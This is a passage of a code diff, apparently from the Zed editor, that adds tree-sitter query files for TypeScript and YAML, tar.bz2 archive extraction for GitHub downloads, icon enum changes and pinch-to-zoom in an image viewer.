b/crates/grammars/src/typescript/indents.scm new file mode 100644 index 0000000000000000000000000000000000000000..2715d2567194f00a9566e9b0c385ae8aa6258df0 --- /dev/null +++ b/crates/grammars/src/typescript/indents.scm @@ -0,0 +1,28 @@ +[ + (call_expression) + (assignment_expression) + (member_expression) + (lexical_declaration) + (variable_declaration) + (assignment_expression) + ; below handled by `(_ "{" "}" @end) @indent` + ; (if_statement) + ; (for_statement) + ; (while_statement) +] @indent + +(_ + "[" + "]" @end) @indent + +(_ + "<" + ">" @end) @indent + +(_ + "{" + "}" @end) @indent + +(_ + "(" + ")" @end) @indent diff --git a/crates/grammars/src/typescript/injections.scm b/crates/grammars/src/typescript/injections.scm new file mode 100644 index 0000000000000000000000000000000000000000..a8cf9a41b5f90a6b9d02358b1b6073286fbe86ac --- /dev/null +++ b/crates/grammars/src/typescript/injections.scm @@ -0,0 +1,199 @@ +((comment) @injection.content + (#set! injection.language "comment")) + +(((comment) @_jsdoc_comment + (#match? @_jsdoc_comment "(?s)^/[*][*][^*].*[*]/$")) @injection.content + (#set! injection.language "jsdoc")) + +(((comment) @_reference + (#match? @_reference "^///\\s+\\s*$")) @injection.content + (#set! injection.language "html")) + +((regex) @injection.content + (#set! injection.language "regex")) + +(call_expression + function: (identifier) @_name + (#eq? @_name "css") + arguments: (template_string + (string_fragment) @injection.content + (#set! injection.language "css"))) + +(call_expression + function: (member_expression + object: (identifier) @_obj + (#eq? @_obj "styled") + property: (property_identifier)) + arguments: (template_string + (string_fragment) @injection.content + (#set! injection.language "css"))) + +(call_expression + function: (call_expression + function: (identifier) @_name + (#eq? @_name "styled")) + arguments: (template_string + (string_fragment) @injection.content + (#set! injection.language "css"))) + +(call_expression + function: (identifier) @_name + (#eq? @_name "html") + arguments: (template_string) @injection.content + (#set! injection.language "html")) + +(call_expression + function: (identifier) @_name + (#eq? @_name "js") + arguments: (template_string + (string_fragment) @injection.content + (#set! injection.language "javascript"))) + +(call_expression + function: (identifier) @_name + (#eq? @_name "json") + arguments: (template_string + (string_fragment) @injection.content + (#set! injection.language "json"))) + +(call_expression + function: (identifier) @_name + (#eq? @_name "sql") + arguments: (template_string + (string_fragment) @injection.content + (#set! injection.language "sql"))) + +(call_expression + function: (identifier) @_name + (#eq? @_name "ts") + arguments: (template_string + (string_fragment) @injection.content + (#set! injection.language "typescript"))) + +(call_expression + function: (identifier) @_name + (#match? @_name "^ya?ml$") + arguments: (template_string + (string_fragment) @injection.content + (#set! injection.language "yaml"))) + +(call_expression + function: (identifier) @_name + (#match? @_name "^g(raph)?ql$") + arguments: (template_string + (string_fragment) @injection.content + (#set! injection.language "graphql"))) + +(call_expression + function: (identifier) @_name + (#match? @_name "^g(raph)?ql$") + arguments: (arguments + (template_string + (string_fragment) @injection.content + (#set! injection.language "graphql")))) + +(call_expression + function: (identifier) @_name + (#match? @_name "^iso$") + arguments: (arguments + (template_string + (string_fragment) @injection.content + (#set! injection.language "isograph")))) + +; Angular Component template injection +(call_expression + function: [ + (identifier) @_decorator + (#eq? @_decorator "Component") + (member_expression + property: (property_identifier) @_decorator + (#eq? @_decorator "Component")) + ] + arguments: (arguments + (object + (pair + key: (property_identifier) @_prop + (#eq? @_prop "template") + value: [ + (string) @injection.content + (template_string) @injection.content + (template_string + (string_fragment) @injection.content) + ]))) + (#set! injection.language "angular")) + +; Angular Component styles injection +(call_expression + function: [ + (identifier) @_decorator + (#eq? @_decorator "Component") + (member_expression + property: (property_identifier) @_decorator + (#eq? @_decorator "Component")) + ] + arguments: (arguments + (object + (pair + key: (property_identifier) @_prop + (#eq? @_prop "styles") + value: [ + (string) @injection.content + (template_string) @injection.content + (template_string + (string_fragment) @injection.content) + (array + (string) @injection.content) + (array + (template_string) @injection.content) + (array + (template_string + (string_fragment)) @injection.content) + ]))) + (#set! injection.language "css")) + +; Parse the contents of strings and tagged template +; literals with leading ECMAScript comments: +; '/* html */' or '/*html*/' +(((comment) @_ecma_comment + [ + (string + (string_fragment) @injection.content) + (template_string + (string_fragment) @injection.content) + ]) + (#match? @_ecma_comment "^\\/\\*\\s*html\\s*\\*\\/") + (#set! injection.language "html")) + +; '/* sql */' or '/*sql*/' +(((comment) @_ecma_comment + [ + (string + (string_fragment) @injection.content) + (template_string + (string_fragment) @injection.content) + ]) + (#match? @_ecma_comment "^\\/\\*\\s*sql\\s*\\*\\/") + (#set! injection.language "sql")) + +; '/* gql */' or '/*gql*/' +; '/* graphql */' or '/*graphql*/' +(((comment) @_ecma_comment + [ + (string + (string_fragment) @injection.content) + (template_string + (string_fragment) @injection.content) + ]) + (#match? @_ecma_comment "^\\/\\*\\s*(gql|graphql)\\s*\\*\\/") + (#set! injection.language "graphql")) + +; '/* css */' or '/*css*/' +(((comment) @_ecma_comment + [ + (string + (string_fragment) @injection.content) + (template_string + (string_fragment) @injection.content) + ]) + (#match? @_ecma_comment "^\\/\\*\\s*(css)\\s*\\*\\/") + (#set! injection.language "css")) diff --git a/crates/grammars/src/typescript/outline.scm b/crates/grammars/src/typescript/outline.scm new file mode 100644 index 0000000000000000000000000000000000000000..37991965256a0def9b0458958ac4e50c6f337af6 --- /dev/null +++ b/crates/grammars/src/typescript/outline.scm @@ -0,0 +1,275 @@ +(internal_module + "namespace" @context + name: (_) @name) @item + +(enum_declaration + "enum" @context + name: (_) @name) @item + +(type_alias_declaration + "type" @context + name: (_) @name) @item + +(function_declaration + "async"? @context + "function" @context + name: (_) @name + parameters: (formal_parameters + "(" @context + ")" @context)) @item + +(generator_function_declaration + "async"? @context + "function" @context + "*" @context + name: (_) @name + parameters: (formal_parameters + "(" @context + ")" @context)) @item + +(interface_declaration + "interface" @context + name: (_) @name) @item + +(export_statement + (lexical_declaration + [ + "let" + "const" + ] @context + (variable_declarator + name: (identifier) @name) @item)) + +; Exported array destructuring +(export_statement + (lexical_declaration + [ + "let" + "const" + ] @context + (variable_declarator + name: (array_pattern + [ + (identifier) @name @item + (assignment_pattern + left: (identifier) @name @item) + (rest_pattern + (identifier) @name @item) + ])))) + +; Exported object destructuring +(export_statement + (lexical_declaration + [ + "let" + "const" + ] @context + (variable_declarator + name: (object_pattern + [ + (shorthand_property_identifier_pattern) @name @item + (pair_pattern + value: (identifier) @name @item) + (pair_pattern + value: (assignment_pattern + left: (identifier) @name @item)) + (rest_pattern + (identifier) @name @item) + ])))) + +(program + (lexical_declaration + [ + "let" + "const" + ] @context + (variable_declarator + name: (identifier) @name) @item)) + +; Top-level array destructuring +(program + (lexical_declaration + [ + "let" + "const" + ] @context + (variable_declarator + name: (array_pattern + [ + (identifier) @name @item + (assignment_pattern + left: (identifier) @name @item) + (rest_pattern + (identifier) @name @item) + ])))) + +; Top-level object destructuring +(program + (lexical_declaration + [ + "let" + "const" + ] @context + (variable_declarator + name: (object_pattern + [ + (shorthand_property_identifier_pattern) @name @item + (pair_pattern + value: (identifier) @name @item) + (pair_pattern + value: (assignment_pattern + left: (identifier) @name @item)) + (rest_pattern + (identifier) @name @item) + ])))) + +(class_declaration + "class" @context + name: (_) @name) @item + +(abstract_class_declaration + "abstract" @context + "class" @context + name: (_) @name) @item + +; Method definitions in classes (not in object literals) +(class_body + (method_definition + [ + "get" + "set" + "async" + "*" + "readonly" + "static" + (override_modifier) + (accessibility_modifier) + ]* @context + name: (_) @name + parameters: (formal_parameters + "(" @context + ")" @context)) @item) + +; Object literal methods +(variable_declarator + value: (object + (method_definition + [ + "get" + "set" + "async" + "*" + ]* @context + name: (_) @name + parameters: (formal_parameters + "(" @context + ")" @context)) @item)) + +(public_field_definition + [ + "declare" + "readonly" + "abstract" + "static" + (accessibility_modifier) + ]* @context + name: (_) @name) @item + +; Add support for (node:test, bun:test and Jest) runnable +((call_expression + function: [ + (identifier) @_name + (member_expression + object: [ + (identifier) @_name + (member_expression + object: (identifier) @_name) + ]) + ] @context + (#any-of? @_name "it" "test" "describe" "context" "suite") + arguments: (arguments + . + [ + (string + (string_fragment) @name) + (identifier) @name + ]))) @item + +; Add support for parameterized tests +((call_expression + function: (call_expression + function: (member_expression + object: [ + (identifier) @_name + (member_expression + object: (identifier) @_name) + ] + property: (property_identifier) @_property) + (#any-of? @_name "it" "test" "describe" "context" "suite") + (#any-of? @_property "each")) + arguments: (arguments + . + [ + (string + (string_fragment) @name) + (identifier) @name + ]))) @item + +; Object properties +(pair + key: [ + (property_identifier) @name + (string + (string_fragment) @name) + (number) @name + (computed_property_name) @name + ]) @item + +; Nested variables in function bodies +(statement_block + (lexical_declaration + [ + "let" + "const" + ] @context + (variable_declarator + name: (identifier) @name) @item)) + +; Nested array destructuring in functions +(statement_block + (lexical_declaration + [ + "let" + "const" + ] @context + (variable_declarator + name: (array_pattern + [ + (identifier) @name @item + (assignment_pattern + left: (identifier) @name @item) + (rest_pattern + (identifier) @name @item) + ])))) + +; Nested object destructuring in functions +(statement_block + (lexical_declaration + [ + "let" + "const" + ] @context + (variable_declarator + name: (object_pattern + [ + (shorthand_property_identifier_pattern) @name @item + (pair_pattern + value: (identifier) @name @item) + (pair_pattern + value: (assignment_pattern + left: (identifier) @name @item)) + (rest_pattern + (identifier) @name @item) + ])))) + +(comment) @annotation diff --git a/crates/grammars/src/typescript/overrides.scm b/crates/grammars/src/typescript/overrides.scm new file mode 100644 index 0000000000000000000000000000000000000000..f5e99cad68a91695d9d0b19b308e3ce19f75555a --- /dev/null +++ b/crates/grammars/src/typescript/overrides.scm @@ -0,0 +1,11 @@ +(comment) @comment.inclusive + +(string) @string + +(template_string + (string_fragment) @string) + +(_ + value: (call_expression + function: (identifier) @function_name_before_type_arguments + type_arguments: (type_arguments))) diff --git a/crates/grammars/src/typescript/runnables.scm b/crates/grammars/src/typescript/runnables.scm new file mode 100644 index 0000000000000000000000000000000000000000..38fee610e85f2aa2f5f7f7c58caf79b3c6a3d1ed --- /dev/null +++ b/crates/grammars/src/typescript/runnables.scm @@ -0,0 +1,71 @@ +; Add support for (node:test, bun:test, Jest and Deno.test) runnable +; Function expression that has `it`, `test` or `describe` as the function name +((call_expression + function: [ + (identifier) @_name + (member_expression + object: [ + (identifier) @_name + (member_expression + object: (identifier) @_name) + ]) + ] + (#any-of? @_name "it" "test" "describe" "context" "suite") + arguments: (arguments + . + [ + (string + (string_fragment) @run) + (identifier) @run + ])) @_js-test + (#set! tag js-test)) + +; Add support for parameterized tests +((call_expression + function: (call_expression + function: (member_expression + object: [ + (identifier) @_name + (member_expression + object: (identifier) @_name) + ] + property: (property_identifier) @_property) + (#any-of? @_name "it" "test" "describe" "context" "suite") + (#any-of? @_property "each")) + arguments: (arguments + . + [ + (string + (string_fragment) @run) + (identifier) @run + ])) @_js-test + (#set! tag js-test)) + +; Add support for Deno.test with string names +((call_expression + function: (member_expression + object: (identifier) @_namespace + property: (property_identifier) @_method) + (#eq? @_namespace "Deno") + (#eq? @_method "test") + arguments: (arguments + . + [ + (string + (string_fragment) @run @DENO_TEST_NAME) + (identifier) @run @DENO_TEST_NAME + ])) @_js-test + (#set! tag js-test)) + +; Add support for Deno.test with named function expressions +((call_expression + function: (member_expression + object: (identifier) @_namespace + property: (property_identifier) @_method) + (#eq? @_namespace "Deno") + (#eq? @_method "test") + arguments: (arguments + . + (function_expression + name: (identifier) @run @DENO_TEST_NAME))) @_js-test + (#set! tag js-test)) diff --git a/crates/grammars/src/typescript/textobjects.scm b/crates/grammars/src/typescript/textobjects.scm new file mode 100644 index 0000000000000000000000000000000000000000..384ea482352dfb1f617357bd3af719a64425d876 --- /dev/null +++ b/crates/grammars/src/typescript/textobjects.scm @@ -0,0 +1,130 @@ +(comment)+ @comment.around + +(function_declaration + body: (_ + "{" + (_)* @function.inside + "}")) @function.around + +(method_definition + body: (_ + "{" + (_)* @function.inside + "}")) @function.around + +(function_expression + body: (_ + "{" + (_)* @function.inside + "}")) @function.around + +((arrow_function + body: (statement_block + "{" + (_)* @function.inside + "}")) @function.around + (#not-has-parent? @function.around variable_declarator)) + +; Arrow function in variable declaration - capture the full declaration +([ + (lexical_declaration + (variable_declarator + value: (arrow_function + body: (statement_block + "{" + (_)* @function.inside + "}")))) + (variable_declaration + (variable_declarator + value: (arrow_function + body: (statement_block + "{" + (_)* @function.inside + "}")))) +]) @function.around + +; Arrow function in variable declaration - capture body as @function.inside +; (for statement blocks, the more specific pattern above captures just the contents) +([ + (lexical_declaration + (variable_declarator + value: (arrow_function + body: (_) @function.inside))) + (variable_declaration + (variable_declarator + value: (arrow_function + body: (_) @function.inside))) +]) @function.around + +; Catch-all for arrow functions in other contexts (callbacks, etc.) +((arrow_function + body: (_) @function.inside) @function.around + (#not-has-parent? @function.around variable_declarator)) + +(function_signature) @function.around + +(generator_function + body: (_ + "{" + (_)* @function.inside + "}")) @function.around + +(generator_function_declaration + body: (_ + "{" + (_)* @function.inside + "}")) @function.around + +(class_declaration + body: (_ + "{" + [ + (_) + ";"? + ]* @class.inside + "}")) @class.around + +(class + body: (_ + "{" + (_)* @class.inside + "}")) @class.around + +(interface_declaration + body: (_ + "{" + [ + (_) + ";"? + ]* @class.inside + "}")) @class.around + +(enum_declaration + body: (_ + "{" + [ + (_) + ","? + ]* @class.inside + "}")) @class.around + +(ambient_declaration + (module + body: (_ + "{" + [ + (_) + ";"? + ]* @class.inside + "}"))) @class.around + +(internal_module + body: (_ + "{" + [ + (_) + ";"? + ]* @class.inside + "}")) @class.around + +(type_alias_declaration) @class.around diff --git a/crates/grammars/src/yaml/brackets.scm b/crates/grammars/src/yaml/brackets.scm new file mode 100644 index 0000000000000000000000000000000000000000..edeb53a0d313846089e716bedff4256e2b47d94e --- /dev/null +++ b/crates/grammars/src/yaml/brackets.scm @@ -0,0 +1,13 @@ +("[" @open + "]" @close) + +("{" @open + "}" @close) + +(("\"" @open + "\"" @close) + (#set! rainbow.exclude)) + +(("'" @open + "'" @close) + (#set! rainbow.exclude)) diff --git a/crates/languages/src/yaml/config.toml b/crates/grammars/src/yaml/config.toml similarity index 96% rename from crates/languages/src/yaml/config.toml rename to crates/grammars/src/yaml/config.toml index 9a07a560b06766ac00dd73b6210023c4cddd491d..95fe81d04dbbb88e1c7deed7a84895cddb7dea1d 100644 --- a/crates/languages/src/yaml/config.toml +++ b/crates/grammars/src/yaml/config.toml @@ -1,6 +1,7 @@ name = "YAML" grammar = "yaml" path_suffixes = ["yml", "yaml", "pixi.lock", "clang-format", "clangd", "bst"] +modeline_aliases = ["yml"] line_comments = ["# "] autoclose_before = ",]}" brackets = [ diff --git a/crates/languages/src/yaml/highlights.scm b/crates/grammars/src/yaml/highlights.scm similarity index 78% rename from crates/languages/src/yaml/highlights.scm rename to crates/grammars/src/yaml/highlights.scm index dfecf3f9d421cf1a574ce03dccfeb1201d8086a9..1d9c97c17a7925e5e9d87ed8e3bfba51c9b11d8b 100644 --- a/crates/languages/src/yaml/highlights.scm +++ b/crates/grammars/src/yaml/highlights.scm @@ -1,4 +1,5 @@ (boolean_scalar) @boolean + (null_scalar) @constant.builtin [ @@ -25,30 +26,31 @@ key: (flow_node [ - (plain_scalar (string_scalar)) + (plain_scalar + (string_scalar)) (double_quote_scalar) (single_quote_scalar) ] @property) [ - "," - "-" - ":" - ">" - "?" - "|" + "," + "-" + ":" + ">" + "?" + "|" ] @punctuation.delimiter [ - "[" - "]" - "{" - "}" + "[" + "]" + "{" + "}" ] @punctuation.bracket [ - "*" - "&" - "---" - "..." + "*" + "&" + "---" + "..." ] @punctuation.special diff --git a/crates/grammars/src/yaml/injections.scm b/crates/grammars/src/yaml/injections.scm new file mode 100644 index 0000000000000000000000000000000000000000..2b94b7f0cdd9d18c3c7157d9bd4adfd1b59ea061 --- /dev/null +++ b/crates/grammars/src/yaml/injections.scm @@ -0,0 +1,26 @@ +((comment) @injection.content + (#set! injection.language "comment")) + +; GitHub actions: JavaScript for workflow scripting (inline and block) +(block_mapping + (block_mapping_pair + key: (flow_node) @_uses + (#eq? @_uses "uses") + value: (flow_node) @_actions_ghs + (#match? @_actions_ghs "^actions/github-script")) + (block_mapping_pair + key: (flow_node) @_with + (#eq? @_with "with") + value: (block_node + (block_mapping + (block_mapping_pair + key: (flow_node) @_run + (#eq? @_run "script") + value: [ + (flow_node + (plain_scalar + (string_scalar) @injection.content)) + (block_node + (block_scalar) @injection.content) + ] + (#set! injection.language "javascript")))))) diff --git a/crates/grammars/src/yaml/outline.scm b/crates/grammars/src/yaml/outline.scm new file mode 100644 index 0000000000000000000000000000000000000000..a41447bf64cceadd1ae3d59bd2804e85bd5e8c39 --- /dev/null +++ b/crates/grammars/src/yaml/outline.scm @@ -0,0 +1,7 @@ +(block_mapping_pair + key: (flow_node + (plain_scalar + (string_scalar) @name)) + value: (flow_node + (plain_scalar + (string_scalar) @context))?) @item diff --git a/crates/languages/src/yaml/overrides.scm b/crates/grammars/src/yaml/overrides.scm similarity index 98% rename from crates/languages/src/yaml/overrides.scm rename to crates/grammars/src/yaml/overrides.scm index 9503051a62080eb2fdfca3416ef9e5286464dd17..99c991e7d445137dc335275138a8fd68cea31d17 100644 --- a/crates/languages/src/yaml/overrides.scm +++ b/crates/grammars/src/yaml/overrides.scm @@ -1,4 +1,5 @@ (comment) @comment.inclusive + [ (single_quote_scalar) (double_quote_scalar) diff --git a/crates/grammars/src/yaml/redactions.scm b/crates/grammars/src/yaml/redactions.scm new file mode 100644 index 0000000000000000000000000000000000000000..56c7415e70f183afe63950511479e74512ac97f8 --- /dev/null +++ b/crates/grammars/src/yaml/redactions.scm @@ -0,0 +1,2 @@ +(block_mapping_pair + value: (flow_node) @redact) diff --git a/crates/languages/src/yaml/textobjects.scm b/crates/grammars/src/yaml/textobjects.scm similarity index 100% rename from crates/languages/src/yaml/textobjects.scm rename to crates/grammars/src/yaml/textobjects.scm diff --git a/crates/grammars/src/zed-keybind-context/brackets.scm b/crates/grammars/src/zed-keybind-context/brackets.scm new file mode 100644 index 0000000000000000000000000000000000000000..24c20234b639f2afe7754b1d6dceb5685ac7b8e7 --- /dev/null +++ b/crates/grammars/src/zed-keybind-context/brackets.scm @@ -0,0 +1,2 @@ +("(" @open + ")" @close) diff --git a/crates/languages/src/zed-keybind-context/config.toml b/crates/grammars/src/zed-keybind-context/config.toml similarity index 100% rename from crates/languages/src/zed-keybind-context/config.toml rename to crates/grammars/src/zed-keybind-context/config.toml diff --git a/crates/languages/src/zed-keybind-context/highlights.scm b/crates/grammars/src/zed-keybind-context/highlights.scm similarity index 100% rename from crates/languages/src/zed-keybind-context/highlights.scm rename to crates/grammars/src/zed-keybind-context/highlights.scm diff --git a/crates/http_client/src/async_body.rs b/crates/http_client/src/async_body.rs index 8fb49f218568ea36078d772a7225229f31a916c4..a59a7339db1e4449b875e2c539e98c86b4279365 100644 --- a/crates/http_client/src/async_body.rs +++ b/crates/http_client/src/async_body.rs @@ -7,6 +7,7 @@ use std::{ use bytes::Bytes; use futures::AsyncRead; use http_body::{Body, Frame}; +use serde::Serialize; /// Based on the implementation of AsyncBody in /// . @@ -88,6 +89,19 @@ impl From<&'static str> for AsyncBody { } } +/// Newtype wrapper that serializes a value as JSON into an `AsyncBody`. +pub struct Json(pub T); + +impl From> for AsyncBody { + fn from(json: Json) -> Self { + Self::from_bytes( + serde_json::to_vec(&json.0) + .expect("failed to serialize JSON") + .into(), + ) + } +} + impl> From> for AsyncBody { fn from(body: Option) -> Self { match body { diff --git a/crates/http_client/src/github.rs b/crates/http_client/src/github.rs index e52e2f1d2555de477cd4597826bc3bd8308faf89..6d2150c8566706188b907e0c9c9ddb8e603f867b 100644 --- a/crates/http_client/src/github.rs +++ b/crates/http_client/src/github.rs @@ -144,6 +144,7 @@ pub async fn get_release_by_tag_name( #[derive(Debug, PartialEq, Eq, Clone, Copy)] pub enum AssetKind { TarGz, + TarBz2, Gz, Zip, } @@ -158,6 +159,7 @@ pub fn build_asset_url(repo_name_with_owner: &str, tag: &str, kind: AssetKind) - "{tag}.{extension}", extension = match kind { AssetKind::TarGz => "tar.gz", + AssetKind::TarBz2 => "tar.bz2", AssetKind::Gz => "gz", AssetKind::Zip => "zip", } diff --git a/crates/http_client/src/github_download.rs b/crates/http_client/src/github_download.rs index 642bbf11c11ce8816a1506c3c4989dce434552d8..47ae2c2b36b1ab37b56ab70735c2ce018bc5e275 100644 --- a/crates/http_client/src/github_download.rs +++ b/crates/http_client/src/github_download.rs @@ -5,7 +5,7 @@ use std::{ }; use anyhow::{Context, Result}; -use async_compression::futures::bufread::GzipDecoder; +use async_compression::futures::bufread::{BzDecoder, GzipDecoder}; use futures::{AsyncRead, AsyncSeek, AsyncSeekExt, AsyncWrite, io::BufReader}; use sha2::{Digest, Sha256}; @@ -119,7 +119,7 @@ async fn extract_to_staging( fn staging_path(parent: &Path, asset_kind: AssetKind) -> Result { match asset_kind { - AssetKind::TarGz | AssetKind::Zip => { + AssetKind::TarGz | AssetKind::TarBz2 | AssetKind::Zip => { let dir = tempfile::Builder::new() .prefix(".tmp-github-download-") .tempdir_in(parent) @@ -141,7 +141,7 @@ fn staging_path(parent: &Path, asset_kind: AssetKind) -> Result { async fn cleanup_staging_path(staging_path: &Path, asset_kind: AssetKind) { match asset_kind { - AssetKind::TarGz | AssetKind::Zip => { + AssetKind::TarGz | AssetKind::TarBz2 | AssetKind::Zip => { if let Err(err) = async_fs::remove_dir_all(staging_path).await { log::warn!("failed to remove staging directory {staging_path:?}: {err:?}"); } @@ -155,6 +155,7 @@ async fn cleanup_staging_path(staging_path: &Path, asset_kind: AssetKind) { } async fn finalize_download(staging_path: &Path, destination_path: &Path) -> Result<()> { + _ = async_fs::remove_dir_all(destination_path).await; async_fs::rename(staging_path, destination_path) .await .with_context(|| format!("renaming {staging_path:?} to {destination_path:?}"))?; @@ -169,6 +170,7 @@ async fn stream_response_archive( ) -> Result<()> { match asset_kind { AssetKind::TarGz => extract_tar_gz(destination_path, url, response).await?, + AssetKind::TarBz2 => extract_tar_bz2(destination_path, url, response).await?, AssetKind::Gz => extract_gz(destination_path, url, response).await?, AssetKind::Zip => { util::archive::extract_zip(destination_path, response).await?; @@ -185,6 +187,7 @@ async fn stream_file_archive( ) -> Result<()> { match asset_kind { AssetKind::TarGz => extract_tar_gz(destination_path, url, file_archive).await?, + AssetKind::TarBz2 => extract_tar_bz2(destination_path, url, file_archive).await?, AssetKind::Gz => extract_gz(destination_path, url, file_archive).await?, #[cfg(not(windows))] AssetKind::Zip => { @@ -212,6 +215,20 @@ async fn extract_tar_gz( Ok(()) } +async fn extract_tar_bz2( + destination_path: &Path, + url: &str, + from: impl AsyncRead + Unpin, +) -> Result<(), anyhow::Error> { + let decompressed_bytes = BzDecoder::new(BufReader::new(from)); + let archive = async_tar::Archive::new(decompressed_bytes); + archive + .unpack(&destination_path) + .await + .with_context(|| format!("extracting {url} to {destination_path:?}"))?; + Ok(()) +} + async fn extract_gz( destination_path: &Path, url: &str, diff --git a/crates/http_client/src/http_client.rs b/crates/http_client/src/http_client.rs index 5cf25a8277872ba3c6d502565e8057623b267d42..bbbe3b1a832332bd6bee693b4c0b916b4f4c182a 100644 --- a/crates/http_client/src/http_client.rs +++ b/crates/http_client/src/http_client.rs @@ -5,7 +5,7 @@ pub mod github; pub mod github_download; pub use anyhow::{Result, anyhow}; -pub use async_body::{AsyncBody, Inner}; +pub use async_body::{AsyncBody, Inner, Json}; use derive_more::Deref; use http::HeaderValue; pub use http::{self, Method, Request, Response, StatusCode, Uri, request::Builder}; diff --git a/crates/icons/src/icons.rs b/crates/icons/src/icons.rs index a8a4e47cd0046fa995b10bb5e91b8884d70cdd6d..e29b7d3593025556771d62dc0124786672c540de 100644 --- a/crates/icons/src/icons.rs +++ b/crates/icons/src/icons.rs @@ -9,7 +9,6 @@ use strum::{EnumIter, EnumString, IntoStaticStr}; #[strum(serialize_all = "snake_case")] pub enum IconName { AcpRegistry, - Ai, AiAnthropic, AiBedrock, AiClaude, @@ -22,11 +21,13 @@ pub enum IconName { AiOllama, AiOpenAi, AiOpenAiCompat, + AiOpenCode, AiOpenRouter, AiVercel, AiVZero, AiXAi, AiZed, + Archive, ArrowCircle, ArrowDown, ArrowDown10, @@ -52,6 +53,7 @@ pub enum IconName { Book, BookCopy, Box, + BoxOpen, CaseSensitive, Chat, Check, @@ -67,7 +69,6 @@ pub enum IconName { Close, CloudDownload, Code, - Cog, Command, Control, Copilot, @@ -94,6 +95,7 @@ pub enum IconName { DebugStepOver, Diff, DiffSplit, + DiffSplitAuto, DiffUnified, Disconnected, Download, @@ -104,7 +106,6 @@ pub enum IconName { EditorSublime, EditorVsCode, Ellipsis, - EllipsisVertical, Envelope, Eraser, Escape, @@ -113,6 +114,7 @@ pub enum IconName { ExpandUp, ExpandVertical, Eye, + EyeOff, FastForward, FastForwardOff, File, @@ -132,6 +134,7 @@ pub enum IconName { Flame, Folder, FolderOpen, + FolderPlus, FolderSearch, Font, FontSize, @@ -147,6 +150,8 @@ pub enum IconName { GitBranchPlus, GitCommit, GitGraph, + GitMergeConflict, + GitWorktree, Github, Hash, HistoryRerun, @@ -170,13 +175,15 @@ pub enum IconName { LockOutlined, MagnifyingGlass, Maximize, + MaximizeAlt, Menu, - MenuAlt, MenuAltTemp, Mic, MicMute, Minimize, + NewThread, Notepad, + OpenFolder, Option, PageDown, PageUp, @@ -191,6 +198,7 @@ pub enum IconName { Power, Public, PullRequest, + QueueMessage, Quote, Reader, RefreshTitle, @@ -210,8 +218,10 @@ pub enum IconName { Send, Server, Settings, - ShieldCheck, Shift, + SignalHigh, + SignalLow, + SignalMedium, Slash, Sliders, Space, @@ -224,26 +234,19 @@ pub enum IconName { Star, StarFilled, Stop, - Supermaven, - SupermavenDisabled, - SupermavenError, - SupermavenInit, - SwatchBook, - SweepAi, - SweepAiDisabled, - SweepAiDown, - SweepAiError, - SweepAiUp, Tab, Terminal, TerminalAlt, - TerminalGhost, TextSnippet, - TextThread, ThinkingMode, ThinkingModeOff, Thread, ThreadFromSummary, + ThreadImport, + ThreadsSidebarLeftClosed, + ThreadsSidebarLeftOpen, + ThreadsSidebarRightClosed, + ThreadsSidebarRightOpen, ThumbsDown, ThumbsUp, TodoComplete, @@ -256,8 +259,6 @@ pub enum IconName { ToolHammer, ToolNotification, ToolPencil, - ToolRead, - ToolRegex, ToolSearch, ToolTerminal, ToolThink, @@ -272,8 +273,6 @@ pub enum IconName { UserRoundPen, Warning, WholeWord, - WorkspaceNavClosed, - WorkspaceNavOpen, XCircle, XCircleFilled, ZedAgent, @@ -286,7 +285,6 @@ pub enum IconName { ZedPredictUp, ZedSrcCustom, ZedSrcExtension, - ZedXCopilot, } impl IconName { diff --git a/crates/image_viewer/Cargo.toml b/crates/image_viewer/Cargo.toml index 92386e8ba8a38f79711ee50343a6e7cf4a393cbd..8d9df8c9edd194f43c3cd4c157f6c7fecc494de4 100644 --- a/crates/image_viewer/Cargo.toml +++ b/crates/image_viewer/Cargo.toml @@ -26,7 +26,7 @@ log.workspace = true project.workspace = true serde.workspace = true settings.workspace = true -theme.workspace = true +theme_settings.workspace = true ui.workspace = true util.workspace = true workspace.workspace = true diff --git a/crates/image_viewer/src/image_viewer.rs b/crates/image_viewer/src/image_viewer.rs index c223494bd709217439bdff9f6a7ba17e1a65494e..dc8d22b67270a58155c05eaf25cb450166e8eb51 100644 --- a/crates/image_viewer/src/image_viewer.rs +++ b/crates/image_viewer/src/image_viewer.rs @@ -8,23 +8,23 @@ use editor::{EditorSettings, items::entry_git_aware_label_color}; use file_icons::FileIcons; use gpui::{ AnyElement, App, Bounds, Context, DispatchPhase, Element, ElementId, Entity, EventEmitter, - FocusHandle, Focusable, GlobalElementId, InspectorElementId, InteractiveElement, IntoElement, - LayoutId, MouseButton, MouseDownEvent, MouseMoveEvent, MouseUpEvent, ParentElement, Pixels, - Point, Render, ScrollDelta, ScrollWheelEvent, Style, Styled, Task, WeakEntity, Window, actions, - checkerboard, div, img, point, px, size, + FocusHandle, Focusable, Font, GlobalElementId, InspectorElementId, InteractiveElement, + IntoElement, LayoutId, MouseButton, MouseDownEvent, MouseMoveEvent, MouseUpEvent, + ParentElement, PinchEvent, Pixels, Point, Render, ScrollDelta, ScrollWheelEvent, Style, Styled, + Task, WeakEntity, Window, actions, checkerboard, div, img, point, px, size, }; use language::File as _; -use persistence::IMAGE_VIEWER; +use persistence::ImageViewerDb; use project::{ImageItem, Project, ProjectPath, image_store::ImageItemEvent}; use settings::Settings; -use theme::ThemeSettings; +use theme_settings::ThemeSettings; use ui::{Tooltip, prelude::*}; use util::paths::PathExt; use workspace::{ ItemId, ItemSettings, Pane, ToolbarItemEvent, ToolbarItemLocation, ToolbarItemView, Workspace, WorkspaceId, delete_unloaded_items, invalid_item_view::InvalidItemView, - item::{BreadcrumbText, Item, ItemHandle, ProjectItem, SerializableItem, TabContentParams}, + item::{HighlightedText, Item, ItemHandle, ProjectItem, SerializableItem, TabContentParams}, }; pub use crate::image_info::*; @@ -260,6 +260,11 @@ impl ImageView { cx.notify(); } } + + fn handle_pinch(&mut self, event: &PinchEvent, _window: &mut Window, cx: &mut Context) { + let zoom_factor = 1.0 + event.delta; + self.set_zoom(self.zoom_level * zoom_factor, Some(event.position), cx); + } } struct ImageContentElement { @@ -522,15 +527,17 @@ impl Item for ImageView { } } - fn breadcrumbs(&self, cx: &App) -> Option> { + fn breadcrumbs(&self, cx: &App) -> Option<(Vec, Option)> { let text = breadcrumbs_text_for_image(self.project.read(cx), self.image_item.read(cx), cx); - let settings = ThemeSettings::get_global(cx); + let font = ThemeSettings::get_global(cx).buffer_font.clone(); - Some(vec![BreadcrumbText { - text, - highlights: None, - font: Some(settings.buffer_font.clone()), - }]) + Some(( + vec![HighlightedText { + text: text.into(), + highlights: vec![], + }], + Some(font), + )) } fn can_split(&self) -> bool { @@ -590,8 +597,9 @@ impl 